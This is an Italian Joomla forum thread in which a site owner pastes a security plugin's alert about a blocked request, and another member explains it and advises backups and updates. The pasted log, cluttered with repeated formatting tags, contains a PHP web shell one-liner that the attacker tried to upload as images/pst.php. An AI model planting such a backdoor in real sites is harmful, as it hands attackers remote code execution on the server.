Joomla.it Forum

Non solo Joomla... => Sicurezza => : bardolph 22 Aug 2012, 15:41:53

: Plugin Marco's interceptor
: bardolph 22 Aug 2012, 15:41:53

Buon giorno a tutti. Seguendi indicazioni dal forum ho installato in un mio sito in Joomla 2.5.6 il plugin in oggetto (anche senza aver capito bene il funzionamento)
Ora ho ricevuto una mail con questo contenuto:
[/code]

:

[color=rgb(34, 34, 34)][font=arial][size=13px]*REMOTE_ADDR :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px]84.73.83.250[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*HTTP_USER_AGENT :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*REQUEST_METHOD :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]POST[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*QUERY_STRING :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*HTTP_REFERER :[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]none[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]** SUPERGLOBALS DUMP (sanitized)[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_GET DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_POST DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[path] => images/pst.php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[raw_data] => <?php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]eval (base64_decode($_POST["php"]))[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px];[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]?>[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_COOKIE DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]*$_REQUEST DUMP[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[path] => images/pst.php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px] -[raw_data] => <?php[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]eval (base64_decode($_POST["php"]))[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px];[/color][/font][/size][color=rgb(34, 34, 34)][font=arial][size=13px][color=rgb(34, 34, 34)][font=arial][size=13px]?>[/color][/font][/size]
[color=rgb(34, 34, 34)][font=arial][size=13px]
[/color][/font][/size]
[color=rgb(34, 34, 34)][font=arial][size=13px]Mi è sembrato di capire che ha impedito un attacco. Vorrei,se possibile, che qualcuno mi spiegasse il significato e mi indicasse se devo prendre qualche provvedimento.[/color][/font][/size]
[color=rgb(34, 34, 34)][font=arial][size=13px]Grazie in anticipo[/color][/font][/size]

: Re:Plugin Marco's interceptor
: jeckodevelopment 22 Aug 2012, 18:00:46

Ciao bardolph,
il plugin in questione intercetta eventuali attacchi di tipo SQL Injection e Local File Inclusion.

nel tuo caso, l'attacco è diretto a questo file:

images/pst.php

controlla che questo file non sia presente nella tua installazione di Joomla.

: Re:Plugin Marco's interceptor
: bardolph 22 Aug 2012, 19:01:37

Grazie mille

: Re:Plugin Marco's interceptor
: jeckodevelopment 22 Aug 2012, 19:25:46

un'ultima raccomandazione!
cerca di fare dei backup regolari di file e database e di tenere costantemente aggiornate la tua installazione di Joomla e tutte le estensioni installate (moduli, plugin, componenti, template framework, ecc)